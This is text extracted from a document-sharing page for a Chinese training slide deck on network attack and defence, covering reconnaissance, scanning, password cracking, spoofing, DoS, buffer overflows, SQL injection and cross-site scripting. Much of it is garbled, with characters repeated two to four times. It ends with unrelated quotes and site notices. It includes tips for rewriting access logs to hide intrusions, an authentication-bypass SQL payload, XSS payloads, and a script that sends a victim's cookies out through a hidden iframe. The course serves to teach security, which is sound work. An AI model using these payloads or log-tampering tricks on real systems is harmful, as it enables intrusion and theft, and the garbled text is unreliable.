安全攻防實踐_第1頁
安全攻防實踐_第2頁
安全攻防實踐_第3頁
安全攻防實踐_第4頁
安全攻防實踐_第5頁
已閱讀5頁,還剩92頁未讀 繼續(xù)免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

安全攻防實踐穆顯亮課程內容2安全攻防知識體知識域安全攻防基礎網絡攻擊基本概念術語安全漏洞基礎安全攻防實踐緩沖區(qū)溢出原理與實例攻擊目標信息收集密碼破解原理與實例拒絕服務攻擊原理與實例網頁腳本攻擊原理與實例欺騙攻擊原理與實例安全漏洞檢測滲透測試基本流程知識子域信息安全漏洞知識域:安全攻防基礎知識子域:網絡攻擊基本概念術語了解網絡攻擊的基本常識了解黑客攻擊的常用術語知識子域:網絡攻擊基本流程了解網絡攻擊的基本步驟了解網絡攻擊各個階段常用的攻擊手段和工具3網絡攻擊基本概念及術語網絡攻擊的方式主動攻擊:掃描、滲透、拒絕服務……被動攻擊:嗅探、釣魚……一些術語后門、RootKit0-day提權社會工程學BotNet(僵尸網絡)B/S(Browser/Server)……4攻擊的過程5踩點定位入侵留后門抹去痕跡信息收集分析目標實施攻擊方便再次進入清理入侵記錄踩點-信息收集6具體見后面介紹為什么要收集信息獲取攻擊目標大概信息網絡信息主機信息應用部署信息……指導下一步攻擊行為信息收集的方式社會工程學媒體(如搜索引擎、廣告介紹等)網絡工具的探測定位-分析目標為什么需要分析目標確定收集信息的準確性更準確的判斷(例如:index.ycs是java開發(fā),開發(fā)人員修改了腳本后綴以迷惑攻擊者)攻擊方式及工具路徑的選擇分析目標的方法掃描漏洞庫論壇等交互應用7入侵-多種多樣的入侵方式針對配置錯誤的攻擊-IPC$的攻擊針對應用漏洞的攻擊-unicode緩沖區(qū)溢出攻擊-idq緩沖區(qū)溢出電子欺騙攻擊-ARP欺騙拒絕服務攻擊-synflood針對弱口令的攻擊-口令破解利用服務的漏洞-本地輸入法漏洞利用應用腳本開發(fā)的漏洞-SQL注入利用人的心理-社會工程學攻擊……8后門可以作什么方便下次直接進入監(jiān)視用戶所有行為、隱私完全控制用戶主機后門放置方式如果已經入侵簡單!如果尚未入侵手動放置利用系統(tǒng)漏洞,遠程植入利用系統(tǒng)漏洞,誘騙執(zhí)行后門-方便下次進入9特洛洛伊伊木木馬馬隨系系統(tǒng)統(tǒng)自自啟啟動動修改改注注冊冊表表服務務Ini文件件RootKit設備備驅驅動動腳本本后后門門難以以查查找找隱藏藏賬賬號號考驗驗管管理理人人員員耐耐心心與與細細心心后門門-方式式10改寫寫訪訪問問日日志志例如如::IIS訪問問日日志志位位置置%WinDir%\System32\LogFiles\W3SVC1\exyymmdd.log改寫寫日日志志的的技技巧巧修改改系系統(tǒng)統(tǒng)日日期期刪除除中中間間文文件件刪除除創(chuàng)創(chuàng)建建的的用用戶戶抹去去痕痕跡跡11信息息收收集集與與密密碼碼破破解解知識識子子域域::攻攻擊擊目目標標信信息息收收集集了解解目目標標系系統(tǒng)統(tǒng)網網絡絡地地址址、、軟軟件件版版本本等等信信息息獲獲取取方方式式了解解網網絡絡設設備備、、系系統(tǒng)統(tǒng)軟軟件件、、應應用用軟軟件件掃掃描描攻攻擊擊的的常常用用工工具具知識識子子域域::密密碼碼破破解解原原理理與與實實例例了解解密密碼碼破破解解技技術術原原理理和和口口令令安安全全基基本本知知識識了解解密密碼碼破破解解常常用用工工具具及及密密碼碼字字典典概概念念12信息息收收集集技技術術公開開信信息息的的合合理理利利用用及及分分析析IP及域域名名信信息息收收集集主機機及及系系統(tǒng)統(tǒng)信信息息收收集集系統(tǒng)統(tǒng)服服務務信信息息的的收收集集系統(tǒng)統(tǒng)、、服服務務及及應應用用漏漏洞洞信信息息收收集集13信息息收收集集技技術術-公開開信信息息的的分分析析公開開信信息息的的合合理理利利用用和和分分析析-信息息后后面面能能反反饋饋出出什什么么??從著著名名的的”照片片泄泄密密”案件件到到““如如何何用用google入侵侵網網站站””1964年《中國國畫畫報報》封面面衣著著判判斷斷::北北緯緯46度至至48度的的區(qū)區(qū)域域-齊齊齊哈哈爾爾與與哈哈爾爾濱濱之之間間所握握手手柄柄的的架架式式->油井井的的直直徑徑鉆井井與與背背后后油油田田間間的的距距離離和和井井架架密密度度->儲量量和和產量量因此此設設計計出出適適合合中中國國大大慶慶的的設設備備,,一一舉舉中中標標14信息息收集集技技術術-搜索索引引擎擎網站站信信息息舉例例::某某網網絡絡提提供供商商在在其其網網站站上上宣宣傳傳“特特惠惠服服務務器器租租用用::RedHatLinux8.0支持持MYSQL/PHP采用用性性能能優(yōu)優(yōu)異異的的Apache1.3.XXWeb服務務器器””搜索索引引擎擎Google搜索索例::某某Web服務務器器存存在在致致命命錯錯誤誤腳腳本本““5sf67.jsp””攻擊擊者者可可通通過過搜搜索索引引擎擎查查找找存存在在該該錯錯誤誤腳腳本本的的網網站站15信息息收收集集技技術術-域名名與與IP查詢詢16域名名與與IP信息息收收集集─WhoisWhois是一個標標準服務務,可以用來查詢域域名是否被注冊以及注冊的詳細資料料Whois可以查詢詢到的信信息域名所有有者域名及IP地址對應應信息聯(lián)系方式式域名到期日期期域名注冊冊日期域名所使用的的DNSServers……信息收集集技術-域名與IP查詢17域名與IP查詢─nslookup操作系統(tǒng)統(tǒng)自帶命命令,主要是用來查詢域域名名稱稱和IP之間的對應關系網絡狀況況查詢─Ping系統(tǒng)自帶帶命令,,測試與遠端電電腦或網絡設備備的連接狀況網絡路徑徑狀況查查詢─tracert系統(tǒng)自帶帶命令,,測試與與遠端電電腦或網絡設備備之間的路徑信息收集集技術-系統(tǒng)鑒別別1.DNS的hinfo紀錄2.Bannergrab3.二進制文文件法4.TCP/IP協(xié)議棧檢檢測法5.ICMP堆棧指紋紋技術18系統(tǒng)鑒別別-DNS的hinfo記錄19系統(tǒng)鑒別別-服務旗標標檢測服務旗標標檢測法法[root@pooh]#telnet3DebianGNU/Linux2.1targetlogin:Redhat:/etc/issue、/etc/bsd:/etc/motdSolaris:/etc/motd缺陷:不不準確,,負責任任的管理理員一般般都修改改這個文文件20FTP回顯信息操作系統(tǒng)回顯Web回顯信息系統(tǒng)鑒別別-二進制文文件分析析法得到遠程程系統(tǒng)的的一個二二進制文文件例如1.webserver目錄下產產生的core文件2.配置不當當?shù)膄tpserver下的二進進制文件件……利用file、readelf命令等來來鑒別21系統(tǒng)鑒別別-TCP/IP協(xié)議棧檢檢測法其原理是是不同廠廠家的IP協(xié)議棧實實現(xiàn)之間間存在許許多細微微的差別別,通過過這些差差別就能能對目標標系統(tǒng)的的操作系系統(tǒng)加以以猜測。。主動檢測測被動檢測測22系統(tǒng)鑒別別-ICMP堆棧指紋紋技術23通過端口口掃描確確定主機開放放的端口口,不同的端端口對應應運行著的的不同的的網絡服服務端口測試試數(shù)據(jù)包包測試響應應數(shù)據(jù)包包信息收集集技術-端口掃描描我知道主主機上開開放的端端口了24端口掃描描類型常規(guī)掃描描(tcpconnectscan)半打開掃掃描(tcpsynscan)隱秘掃描((StealthScan)SYN/ACKscan:發(fā)送一個個SYN/ACK分組,測知防火墻墻的規(guī)則設設計。它可可確定防火火墻是否只只是簡單的的分組過濾濾(只允許已建建立好的連連接);還是一個個基于狀態(tài)態(tài)的防火墻墻(可執(zhí)行高級級的分組過過濾)FINscan:發(fā)送FIN分組,目標標系統(tǒng)應給給所有關閉閉著的端口口發(fā)回一個個RST分組,這種種技巧通常常只工作在在基于UNIX的TCP/IP協(xié)議上;Xmasscan:這一技巧巧是往目標標端口發(fā)送送一個FIN、URG、PUSH置位的分組組,如果目目標端口關關閉,則返返回一個RST分組;Nullscan:發(fā)送所有有標識位復復位的TCP分組;UDP掃描25端口掃描-常規(guī)掃描26掃描的方法──TCPConnectScan主要是利用用TCP三次握手(Three-wayhandshaking)的連接方式來達到掃描的目的AB1.SYN2.SYN+ACK3.ACK三次握手使用Nmap做TCPConnectScan端口掃描-半打開掃描描27掃描的方法──TCPSYNScan沒有完成三三次握手如左上圖,當主機A收到主機B的回應后,並不會回傳ACK數(shù)據(jù)包給主機B。TCPSYNScan的優(yōu)缺點優(yōu)點:由于沒有完成TCP三次握手,所以不會在目標主機上留下記錄。缺點:需有管理者的權限才可執(zhí)行TCPSYNScan(以左上圖為例,必需要有主機A的管理者權限)。AB1.SYN2.SYN+ACK3.ACK三次握手使用Nmap做TCPSYNScan端口掃描-UDP掃描28掃描的方法──UDPPortScan由掃描主機發(fā)發(fā)出UDP數(shù)據(jù)包給目標主機機的UDPPort,並等待目目標主機Port送回ICMPUnreachable信息。若收到目標主機Port傳回的ICMPUnreachable信息,則表示該Port處于關閉的狀態(tài)。若沒有收到到目標主機Port傳回的ICMPUnreachable信息,則表示該Port可能處于Listen狀態(tài)。UDPPortScan的缺點UDP協(xié)議不可靠可能被防火火墻過濾掉使用Nmap做udpScan端口掃描策策略隨機端口掃掃描慢掃描碎片掃描欺騙掃描……29信息收集技技術-漏洞掃描根據(jù)目標主主機開放的的不同應用用和服務來來掃描和判判斷是否存存在或可能能存在某些些漏洞意義進行網絡安安全評估為網絡系統(tǒng)統(tǒng)的加固提提供先期準準備被網絡攻擊擊者加以利利用來獲取取重要的數(shù)數(shù)據(jù)信息30對一個信息息系統(tǒng)來說說,它的安安全性不在在于它是否否采用了最最新的加密密算法或最最先進的設設備,而是是由系統(tǒng)本本身最薄弱弱之處,即即漏洞所決決定的。只只要這個漏漏洞被發(fā)現(xiàn)現(xiàn),系統(tǒng)就就有可能成成為網絡攻攻擊的犧牲牲品。信息安全的的“木桶理論”31信息收集技技術-漏洞掃描工工具網絡設備漏漏洞掃描器器CiscoAuditingTools集成化的漏漏洞掃描器器NessusShadowSecurityScannereEye的RetinaInternetSecurityScannerGFILANguard專業(yè)web掃描軟件IBMappscanAcunetixWebVulnerability數(shù)據(jù)庫漏洞洞掃描器ISSDatabaseScanneroscannerOracle數(shù)據(jù)庫掃描描器Metacoretex數(shù)據(jù)安全審審計工具工具介紹-端口掃描Nmap簡介被稱為“掃掃描器之王王”有forUnix和forWin的兩種版本本需要Libpcap庫和Winpcap庫的支持能夠進行普普通掃描、、各種高級級掃描和操操作系統(tǒng)類類型鑒別等等使用-sS:半開式掃描描-sT:普通connect()掃描-sU:udp端口掃描-O:操作系統(tǒng)鑒鑒別-P0:強行掃描((無論是否否能夠ping通目標)-p:指定端口范范圍-v:詳細模式式32工具介紹紹-端口掃描描SuperScan簡介基于Windows平臺速度快,,圖形化化界面使用傻瓜化33工具介紹紹-漏洞掃描描Nessus構架服務器端端:基于于Unix系統(tǒng)客戶端::有GTK、Java和Win系統(tǒng)支持持運作客戶端連連接服務務器端,,并下載載插件和和掃描策策略真正的掃掃描由服服務器端端發(fā)起兩者之間間的通信信通過加加密認證證優(yōu)勢:具有強大大的插件件功能完全免費費,升級級快速非常適合合作為網網絡安全全評估工工具34工具介紹紹-漏洞掃描描X-Scan國產自主主開發(fā)完全免費費比較古老老,缺乏乏維護35工具介紹紹-web安全掃描描IBMAppScan36AcunetixWebVulnerabilityScanner優(yōu)秀的Web安全測試試軟件37密碼破解解-利用人性性懶惰38密碼破解解方法密碼窮舉暴力破解密碼工具具密碼暴力破破解工具具密碼字典生生成工具具密碼破解解-密碼窮舉舉39密碼明文對明文密碼進行加密對比密文更換密碼明文已知密碼碼加密算算法及密密文情況況下的破破解方法法ID:cisppsw:123456Ok,youcanlogininID:cisppsw:No,youcannotloginin112123123412345123456OK,youcanlogininNo,youcannotlogininNo,youcannotlogininNo,youcannotlogininNo,youcannotloginin密碼破解解-口令暴力力猜解40破解工具具JohntheRipperL0Phtcrack……41根據(jù)用戶戶規(guī)則快快速生成成各類密密碼字典典提高密碼碼破解效效率密碼破解知知識的具具體體現(xiàn)現(xiàn)攻擊者常常用的工工具……字典生成成器42系統(tǒng)及應用用安全策策略對抗抗密碼限制密碼碼嘗試次次數(shù)限制必須須提供安安全的密密碼密碼有效效期等好的密碼碼特征自己容易記記住,別別人不好好猜……密碼破解安安全防御御43欺騙攻擊擊與拒絕絕服務攻攻擊44知識子域域:欺騙攻擊擊原理與與實例理解IP欺騙、ARP欺騙、DNS欺騙的原原理和危危害了解防范范欺騙攻攻擊的基基本方法法知識子域域:拒絕服務務工具原原理與實實例理解SYNFlood、UDPFlood、Land攻擊、TearDrop攻擊等典典型DoS攻擊的原原理及危危害理解DDoS攻擊的原原理了解防范范DoS/DDoS攻擊的基基本方法法欺騙攻擊擊定義BACHello,I’mB!欺騙攻擊擊(Spoofing)是指通通過偽造造源于可可信任地地址的數(shù)數(shù)據(jù)包以以使一臺臺機器認認證另一一臺機器器的復雜雜技術45欺騙攻擊擊的主要要方式IP欺騙(IPSpoof)DNS欺騙ARP欺騙TCP會話劫持持路由欺騙騙……46客戶服務器Synsend連接請求求回應(ISN)Syn+ack確認(ISN+1)會話過程程47IP欺騙基礎知識識-三次握手IP欺騙實現(xiàn)步驟IP欺騙攻擊方法法中包括了一一系列攻擊步驟確認攻擊目標使要冒充主機無法響應目標主機猜正確的序數(shù)冒充受信主機進行會話48IP欺騙實例講解BAC同步flood攻擊連接請求偽造B進行系列會話話A的序數(shù)規(guī)則49防止IP欺騙50嚴格設置路由由策略:拒絕來自網網上,且聲明明源于本地地地址的包使用最新的系系統(tǒng)和軟件,,避免會話序序號被猜出使用抗IP欺騙功能的產產品嚴密監(jiān)視網絡絡,對攻擊進進行報警ARP欺騙基礎-Arp協(xié)議工作過程程bb:bb:bb:bb:bbcc:cc:cc:cc:ccaa:aa:aa:aa:aaWho’sIPisWho’sIPis192.168.1.aMACaa:aa:aa:aa:isIsee,Iwillcache51ARP欺騙實現(xiàn)bb:bb:bb:bb:bbcc:cc:cc:cc:ccaa:aa:aa:aa:aaMACcc:cc:cc:cc:ccisIsee,IwillcacheMACdf:df:df:df:dfisIcouldn’tfind52Internet地址物物理理地址cc:cc:cc:cc:ccARP欺騙防御53使用靜態(tài)ARP緩存IP與MAC地址綁定ARP防御工具DNS欺騙基礎-DNS協(xié)議工作過程程其他DNSIwillcacheIdon’tknow,IwillaskotherIt’sinmycache54DNS服務器客戶機客戶機DNS服務器DNS欺騙實現(xiàn)Idon’tknow,IwillaskotherOtherDNSIwillcacheIt’sinmycache55攻擊者DNS服務器DNS服務器客戶機DNS欺騙防御56安裝最新版本本的DNS軟件安全設置對抗抗DNS欺騙關閉DNS服務遞歸功能能限制域名服務務器作出響應應的地址限制域名服務務器作出響應應的遞歸請求求地址限制發(fā)出請求求的地址其他欺騙攻擊擊-路由欺騙ICMP重定向報文欺騙RIP路由欺騙源徑路由欺騙騙57拒絕服務攻擊擊定義拒絕服務式攻攻擊(DenialofService),顧名思義就就是讓被攻擊擊的系統(tǒng)無法法正常進行服服務的攻擊方方式。拒絕服務攻擊擊方式利用大量數(shù)據(jù)據(jù)擠占網絡帶帶寬利用大量請求求消耗系統(tǒng)性性能利用協(xié)議實現(xiàn)現(xiàn)缺陷利用系統(tǒng)處理理方式缺陷58典型的拒絕服服務攻擊方式式SYNFloodUDPFloodTeardropLANDSmurf……59(syn)Hello,I’mhere(syn+ack)I’mready?I’mwaiting………SYNFlood(syn)Hello,I’mhere?I’mwaiting………(syn)Hello,I’mhere………I’mwaiting………I’mwaiting………I’mwaiting………UDPFLOODUDPFlood1)大大量量UDP小包包沖沖擊擊應應用用服服務務器器((DNS、Radius認證證等等))2)利利用用系系統(tǒng)統(tǒng)服服務務形形成成流流量量((Echochargen)3)利用用正正常常UDP服務務發(fā)發(fā)送送大大流流量量形形成成網網絡絡擁擁塞塞61LAND攻擊擊運用用IPSpoofing技術術送送出出一一連連串串SYN數(shù)據(jù)據(jù)包包給給目目標標主主機機,,讓讓目目標標主主機機系系統(tǒng)統(tǒng)誤誤以以為為這這些些數(shù)數(shù)據(jù)據(jù)包包是是由由自自己己發(fā)發(fā)送送的的。。由由于于目目標標主主機機在在處處理理這這些些數(shù)數(shù)據(jù)據(jù)包包的的時時候候,,它它自自己己并并無無法法回回應應給給自自己己SYN-ACK數(shù)據(jù)據(jù)包包,,因因而而造造成成系系統(tǒng)統(tǒng)當當機機。。621(SYN)hello,I’m1Syn+AckAckSYNSYN+ACKACKPSH1:1025………PSH1025:2049………PSH2049:3073………FINACKPSH1:1025………PSH1000:2049………PSH2049:3073………試圖圖重重組組時時主機機崩崩潰潰TearDrop(分分片片攻攻擊擊))63Smurf攻擊擊黑客客偽裝裝受受害害者者IP中間間網網站站目標標子子網絡絡主主機機目標標子子網絡絡主主機機目標標子子網絡絡主主機機攻擊擊信信息息大量量ICMP封包(Layer3)子網網絡絡主主機機子網網絡絡主主機機子網網絡絡主主機機目標標網網站站大量量廣廣播播(Layer2)64拒絕絕服服務務攻攻擊擊的的危危害害消耗耗帶帶寬寬癱瘓瘓服服務務器器DNS網頁頁電子子郵郵件件阻塞塞網網絡絡路由由器器交換換器器65DDoS攻擊擊原原理理66工具具介介紹紹TFN2KTrinoo67313352766527444udpmasterclient..主機機列列表表telnetbetaalmostdone攻擊擊指指令令目標標主機機nc拒絕絕服服務務攻攻擊擊防防御御定期期掃掃描描過濾濾不不必必要要的的端端口口與與服服務務節(jié)點點配配置置防防火火墻墻/DDOS設備備過濾濾IP地址址限制制SYN/ICMP流量量檢查查來來源源68緩沖沖區(qū)區(qū)溢溢出出與與網網頁頁腳腳本本安安全全69知識識子子域域::緩緩沖沖區(qū)區(qū)溢溢出出原原理理與與實實例例理解解緩緩沖沖區(qū)區(qū)溢溢出出的的原原理理和和危危害害了解解防防范范緩緩沖沖區(qū)區(qū)溢溢出出的的基基本本方方法法知識識子子域域::網網頁頁腳腳本本原原理理與與實實例例理解解SQL注入入攻攻擊擊的的原原理理和和危危害害了解解防防范范SQL注入入攻攻擊擊的的基基本本方方法法理解解跨跨站站腳腳本本攻攻擊擊的的原原理理和和危危害害了解解防防范范跨跨站站腳腳本本攻攻擊擊的的基基本本方方法法緩沖沖區(qū)區(qū)溢溢出出緩沖沖區(qū)區(qū)溢溢出出原原理理緩沖沖區(qū)區(qū)溢溢出出簡簡單單示示例例緩沖沖區(qū)區(qū)溢溢出出防防御御70緩沖沖區(qū)區(qū)溢溢出出71原理理緩沖沖區(qū)區(qū)溢溢出出攻攻擊擊利利用用編編寫寫不不夠夠嚴嚴謹謹?shù)牡某坛绦蛐颍?,通通過過向向程程序序的的緩緩存存區(qū)區(qū)寫寫入入超超過過預預定定長長度度的的數(shù)數(shù)據(jù)據(jù),,造造成成緩緩存存的的溢溢出出,,從從而而破破壞壞程程序序的的堆堆棧棧,,導導致致程程序序執(zhí)執(zhí)行行流流程程的的改改變變。。基礎礎知知識識堆棧棧寄存存器器指針針緩沖沖區(qū)區(qū)溢溢出出基基礎礎-堆棧棧及及指指針針堆棧棧概概念念一段連連續(xù)續(xù)分分配配的的內內存存空空間堆棧棧特特點點后進進先先出出堆棧棧生生長長方方向向與與內內存存地地址址方方向向相相反反指針針指針針是是指指向向內內存存單單元元的的地地址址寄存存器有限限存存貯貯容容量量的的高高速速存存貯貯部部件件,,它它們們可可用用來來暫暫存存指指令令、、數(shù)數(shù)據(jù)據(jù)和和位位址34H12H78H56H0108HESP棧頂堆棧棧(AL)(AH)34H12H78H56H0106HESP棧頂72棧底棧底簡單示示例Buffer.c#include<stdio.h>intmain(){charname[8];printf("Pleaseinputyourname:");gets(name);printf("younameis:%s!",name);return0;}73程序作作用::將用戶戶輸入入的內內容打打印在在屏幕幕上簡單示示例74用戶輸入內容在8位以內時候,程序正常執(zhí)行用戶輸入內容超過8位以后,程序執(zhí)行產生錯誤簡單示示例由于返返回地地址已已經被被覆蓋蓋,函函數(shù)執(zhí)執(zhí)行返返回地地址時時會將將覆蓋內內容當作返返回地地址,,然后后試圖圖執(zhí)行行相應應地址的指令,,從而而產生生錯誤誤。75當我們們全部部輸入入a時,錯錯誤指指令地地址為為0x616161,0x61是a的ASCII編碼76內存底底部內內存存頂部部nameEBPret[cispcisp][][]堆棧頂頂部堆堆棧棧底部部堆棧情況況nameEBPret[aaaaaaaa][aaaa][aaaa]由于輸輸入的的name超過了了定義義變量量的長長度((8位),,堆棧棧中預預計的的位置置無法法容納納,只只好向內內存頂頂部繼繼續(xù)寫寫‘a’,由于堆棧棧的生生長方方向與與內存存的生生長方方向相相反,用戶輸入入的‘‘a’覆蓋了了堆棧底部EBP和ret。程序序在返返回時時,將將EBP中的‘‘aaaa’的ASCII碼:0x61616161作為返返回地地址,試圖執(zhí)執(zhí)行0x61616161處指令令,導導致錯錯誤,,形成成一次次堆棧溢溢出77緩沖區(qū)區(qū)溢出出危害害尋找程序漏洞編制緩沖區(qū)溢出程序精確控制跳轉地址執(zhí)行設定的代碼獲得系統(tǒng)權限或破壞系統(tǒng)危害::如果果可精精確控控制內內存跳跳轉地地址,,就可可以執(zhí)執(zhí)行指指定代代碼,,獲得得權限限或破破壞系系統(tǒng)78緩沖區(qū)區(qū)溢出其他他知識識緩沖區(qū)區(qū)溢出出分類類堆溢出出棧溢出出Shellcode一段用用于溢溢出并并獲取取權限限的代代碼……緩沖區(qū)區(qū)溢出出防御御編寫安全全代碼最根本本的解解決方方法,,對輸輸入數(shù)數(shù)據(jù)進進行驗驗證緩沖區(qū)不可可執(zhí)行行技術術使被攻攻擊程程序的的數(shù)據(jù)據(jù)段地地址空空間不不可執(zhí)執(zhí)行,,從而而使攻擊者不不可能能執(zhí)行輸入緩沖沖區(qū)的的代碼碼指針完整整性檢檢查數(shù)組越界界保護護79網頁腳腳本安安全腳本安安全的的概念念SQL注入原原理及及危害害跨站腳腳本原原理及及危害害80概念腳本攻攻擊是是針對對Web應用的的攻擊擊腳本攻攻擊主主要是是針對對動態(tài)態(tài)網站站進行行的攻攻擊,,其原原因是是在建建立動動態(tài)網網頁的的過程程中沒沒有對對用戶戶的輸輸入輸輸出進進行有有效的的合法法性驗驗證動態(tài)網站站交互性::即網頁頁會根據(jù)據(jù)用戶的的要求和和選擇而而動態(tài)改改變和響響應,將將瀏覽器器作為客客戶端界界面自動更新新:即無無須手動動地更新新HTML文檔,便便會自動動生成新新的頁面面,可以以大大節(jié)節(jié)省工作作量因時因人人而變::即當不不同的時時間、不不同的人人訪問同同一網址址時會產產生不同同的頁面面81腳本分類類靜態(tài)腳本本HTML動態(tài)腳本本aspphpjspvbs…82SQL注入SQL注入(SQLInjection):程序序員在編編寫代碼碼的時候候,沒有有對用戶戶輸入數(shù)數(shù)據(jù)的合合法性進進行判斷斷,使應應用程序序存在安安全隱患患。用戶戶可以提提交一段段數(shù)據(jù)庫庫查詢代代碼,根根據(jù)程序序返回的的結果,,獲得某某些他想想得知的的數(shù)據(jù)或或進行數(shù)數(shù)據(jù)庫操操作操作系統(tǒng)Web應用數(shù)據(jù)庫服務器123調用數(shù)據(jù)庫查詢直接調用操作系統(tǒng)命令通過數(shù)據(jù)庫調用操作系統(tǒng)命令83SQL注入基礎礎知識SQL(StructuredQueryLanguage):結構化化的查詢詢語言,,是關系系型數(shù)據(jù)據(jù)庫通訊訊的標準準語言。。查詢:Selectstatementfromtablewherecondition刪除記錄錄:deletefromtablewherecondition更新記錄錄:updatetablesetfield=valuewherecondtion添加記錄錄:insertintotablefieldvalues(values)常用函數(shù)數(shù)Count()Asc(‘nchar’),unicode(‘nchar’)mid(str,n1,n2),substring(str,n1,n2)84SQL注入簡單單示例Select*fromtablewhereuser=‘admin’andpwd=‘SdfG#345!’;adminSdfG#345!85Select*fromtablewhereuser=‘admin’andpwd=‘123’or‘1=1’admin123’or‘1=1由于密碼碼的輸入入方式,,使得查查詢語句句返回值值永遠為為True,因此通通過驗證證SQL注入范例例-收集信息息86http://xx.xxx.xx.xx/playnews.asp?id=772’and‘‘1=1MicrosoftOLEDBProviderforODBCDrivers錯誤'80040e14'[Microsoft][ODBCMicrosoftAccessDriver]字符串的的語法錯錯誤在在查詢表表達式'id=772''中。/displaynews.asp,行31說明:數(shù)據(jù)庫為為Access程序沒有有對于id進行過濾濾數(shù)據(jù)庫表表中有個個字段名名為idSQL注入范例例-操作作數(shù)據(jù)庫庫87SQL注入范例例-執(zhí)行行系統(tǒng)命命令8889SQL注入防御御開發(fā)時過過濾特殊殊字符:單引號、、雙引號號、斜杠杠、反斜斜杠、冒冒號、空空字符等等的字符符過濾的對對象:用戶的輸輸入提交的URL請求中的的參數(shù)部部分從cookie中得到的的數(shù)據(jù)部署防SQL注入系統(tǒng)統(tǒng)或腳本本跨站腳本本定義跨站腳本本(CSS-CrossSiteScripting)在遠程Web頁面的HTML代碼中插插入的具具有惡意意目的的的數(shù)據(jù),,用戶認認為該頁頁面是可可信的,,但是當當瀏覽器器下載該該頁面時時,嵌入入其中的的腳本將將被解釋釋執(zhí)行跨站腳本本成因CGI程序沒有有對用戶戶提交的的變量中中的HTML代碼進行行過濾或或轉換。。這種攻擊擊利用的的是用戶戶和服務務器之間間的信任任關系,,以及Web站點沒有有使用有有效的輸輸入輸出出驗證來來拒絕嵌嵌入的腳腳本。90跨站腳本本危害1.獲取取其他用用戶Cookie中的敏感感數(shù)據(jù)2.屏蔽蔽頁面特特定信息息3.偽造造頁面信信息4.拒絕絕服務攻攻擊5.突破破外網內內網不同同安全設設置6.與其其它漏洞洞結合7.其它它91跨站腳本本范例-執(zhí)行Javascript有很多種種方式可可造成Javascript的執(zhí)行,,以下舉舉例兩種種最原始的的范例如如下:第二種方方式,利利用expression指令來造造成javascript執(zhí)行,范范例如下下:92body{background-image:url("javascript:alert('XSS')");}body{background-image:expression(alert("XSS"));}跨站腳本本危害范范例-Cookies竊取93Web服務器URL大小為0的iframe將字符編編碼傳送送varcode;vartarget="/?";info=escape(document.cookie);target=target+info;code="<iframestyle='display:none;'src=";code=code+target;code=code+"width=0height=0></iframe>";document.write(code);跨站腳本本危害-竊取Cookies更改Cookies成功獲取取身份94小結腳本攻擊擊從本質質上是一一種過濾濾不足造造成的攻攻擊腳本是不不需要編編譯的程程序代碼碼,依賴賴腳本引引擎來解解釋執(zhí)行行,具有有很好的的操作系系統(tǒng)適應應性和可可移植性性如果不可可信的內內容被引引入到動動態(tài)頁面面中,則則無論是是網站還還是客戶戶機都沒沒有足夠夠的信息息識別這這種情況況的發(fā)生生并采取取保護措措施腳本攻擊擊方法主主要包括括:SQL注入攻擊擊、命令令注入、、跨站腳腳本攻擊擊等95謝謝,請請?zhí)釂栴}題!9、靜夜四無鄰鄰,荒居舊業(yè)業(yè)貧。。12月-2212月-22Thursday,December29,202210、雨中中黃葉葉樹,,燈下下白頭頭人。。。12:33:0112:33:0112:3312/29/202212:33:01PM11、以我獨獨沈久,,愧君相相見頻。。。12月-2212:33:0212:33Dec-2229-Dec-2212、故人人江海海別,,幾度度隔山山川。。。12:33:0212:33:0212:33Thursday,December29,202213、乍見見翻疑疑夢,,相悲悲各問問年。。。12月月-2212月月-2212:33:0212:33:02December29,202214、他鄉(xiāng)生白發(fā)發(fā),舊國見青青山。。29十二月月202212:33:02下下午午12:33:0212月月-2215、比不了了得就不不比,得得不到的的就不要要。。。十二月2212:33下下午12月-2212:33December29,202216、行動出成果果,工作出財財富。。2022/12/2912:33:0212:33:0229December202217、做

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論